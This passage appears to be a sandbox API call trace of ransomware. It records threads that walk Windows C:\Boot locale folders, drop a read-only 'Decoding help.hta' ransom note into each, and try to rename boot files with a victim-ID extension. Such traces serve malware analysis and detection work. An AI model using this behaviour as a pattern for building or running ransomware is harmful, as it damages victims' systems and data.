ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.574] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.574] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.574] FindNextFileW (in: hFindFile=0x5d7d50, lpFindFileData=0x840fd30 | out: lpFindFileData=0x840fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.576] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Boot\\pt-PT\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\*.*") returned="\\\\?\\C:\\Boot\\pt-PT\\*.*" [0040.576] lstrlenW (lpString="\\\\?\\C:\\Boot\\pt-PT\\*.*") returned 21 [0040.576] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-PT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\pt-PT\\Decoding help.hta" [0040.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\Decoding help.hta" (normalized: "c:\\boot\\pt-pt\\decoding help.hta")) returned 0xffffffff [0040.576] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\Decoding help.hta" (normalized: "c:\\boot\\pt-pt\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.819] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x840fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x840fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.820] CloseHandle (hObject=0x33c) returned 1 [0040.820] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.275] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.275] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\pt-PT\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\*.*") returned="\\\\?\\C:\\Boot\\pt-PT\\*.*" [0041.275] lstrlenW (lpString="\\\\?\\C:\\Boot\\pt-PT\\*.*") returned 21 [0041.275] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-PT\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" [0041.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" [0041.275] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.275] FindNextFileW (in: hFindFile=0x5d7d50, lpFindFileData=0x840fd30 | out: lpFindFileData=0x840fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.275] FindClose (in: hFindFile=0x5d7d50 | out: hFindFile=0x5d7d50) returned 1 Thread: id = 84 os_tid = 0xb84 [0039.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*.*", lpFindFileData=0x854fd30 | out: lpFindFileData=0x854fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d90 [0040.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.577] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x854fd30 | out: lpFindFileData=0x854fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.577] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.577] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x854fd30 | out: lpFindFileData=0x854fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.578] lstrcpyW (in: lpString1=0x9b01290, lpString2="\\\\?\\C:\\Boot\\ru-RU\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\*.*") returned="\\\\?\\C:\\Boot\\ru-RU\\*.*" [0040.578] lstrlenW (lpString="\\\\?\\C:\\Boot\\ru-RU\\*.*") returned 21 [0040.578] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ru-RU\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\ru-RU\\Decoding help.hta" [0040.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\Decoding help.hta" (normalized: "c:\\boot\\ru-ru\\decoding help.hta")) returned 0xffffffff [0040.578] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\Decoding help.hta" (normalized: "c:\\boot\\ru-ru\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.827] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x854fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x854fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.828] CloseHandle (hObject=0x33c) returned 1 [0040.828] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.275] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.275] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\ru-RU\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\*.*") returned="\\\\?\\C:\\Boot\\ru-RU\\*.*" [0041.275] lstrlenW (lpString="\\\\?\\C:\\Boot\\ru-RU\\*.*") returned 21 [0041.275] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ru-RU\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" [0041.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" [0041.275] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.276] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x854fd30 | out: lpFindFileData=0x854fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.276] FindClose (in: hFindFile=0x5d7d90 | out: hFindFile=0x5d7d90) returned 1 Thread: id = 85 os_tid = 0xb88 [0039.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*.*", lpFindFileData=0x868fd30 | out: lpFindFileData=0x868fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.641] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.641] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x868fd30 | out: lpFindFileData=0x868fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.641] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.641] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.641] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x868fd30 | out: lpFindFileData=0x868fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.641] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Boot\\sv-SE\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\*.*") returned="\\\\?\\C:\\Boot\\sv-SE\\*.*" [0039.641] lstrlenW (lpString="\\\\?\\C:\\Boot\\sv-SE\\*.*") returned 21 [0039.641] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sv-SE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\sv-SE\\Decoding help.hta" [0039.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\Decoding help.hta" (normalized: "c:\\boot\\sv-se\\decoding help.hta")) returned 0xffffffff [0039.641] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\Decoding help.hta" (normalized: "c:\\boot\\sv-se\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0039.642] WriteFile (in: hFile=0x1e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x868fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x868fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.642] CloseHandle (hObject=0x1e0) returned 1 [0039.643] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.643] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.643] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.643] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\sv-SE\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\*.*") returned="\\\\?\\C:\\Boot\\sv-SE\\*.*" [0039.643] lstrlenW (lpString="\\\\?\\C:\\Boot\\sv-SE\\*.*") returned 21 [0039.643] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sv-SE\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" [0039.643] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" [0039.643] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.643] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x868fd30 | out: lpFindFileData=0x868fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.643] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 86 os_tid = 0xb8c [0039.612] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*.*", lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.644] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.644] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.644] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.644] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.644] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.644] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Boot\\tr-TR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\*.*") returned="\\\\?\\C:\\Boot\\tr-TR\\*.*" [0039.644] lstrlenW (lpString="\\\\?\\C:\\Boot\\tr-TR\\*.*") returned 21 [0039.644] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\tr-TR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\tr-TR\\Decoding help.hta" [0039.644] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\Decoding help.hta" (normalized: "c:\\boot\\tr-tr\\decoding help.hta")) returned 0xffffffff [0039.644] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\Decoding help.hta" (normalized: "c:\\boot\\tr-tr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0039.645] WriteFile (in: hFile=0x1e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x87cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x87cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.645] CloseHandle (hObject=0x1e0) returned 1 [0039.646] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.646] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.646] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.646] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\tr-TR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\*.*") returned="\\\\?\\C:\\Boot\\tr-TR\\*.*" [0039.646] lstrlenW (lpString="\\\\?\\C:\\Boot\\tr-TR\\*.*") returned 21 [0039.646] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\tr-TR\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" [0039.646] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" [0039.646] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.647] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x87cfd30 | out: lpFindFileData=0x87cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.647] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 87 os_tid = 0xb90 [0039.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*.*", lpFindFileData=0x890fd30 | out: lpFindFileData=0x890fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.632] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.632] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x890fd30 | out: lpFindFileData=0x890fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.632] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.632] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.632] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x890fd30 | out: lpFindFileData=0x890fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.632] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\zh-CN\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\*.*") returned="\\\\?\\C:\\Boot\\zh-CN\\*.*" [0039.632] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-CN\\*.*") returned 21 [0039.632] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-CN\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\zh-CN\\Decoding help.hta" [0039.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\Decoding help.hta" (normalized: "c:\\boot\\zh-cn\\decoding help.hta")) returned 0xffffffff [0039.632] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\Decoding help.hta" (normalized: "c:\\boot\\zh-cn\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0039.632] WriteFile (in: hFile=0x134, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x890fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x890fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.633] CloseHandle (hObject=0x134) returned 1 [0039.633] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.634] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.634] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.634] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\zh-CN\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\*.*") returned="\\\\?\\C:\\Boot\\zh-CN\\*.*" [0039.634] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-CN\\*.*") returned 21 [0039.634] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-CN\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" [0039.634] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") 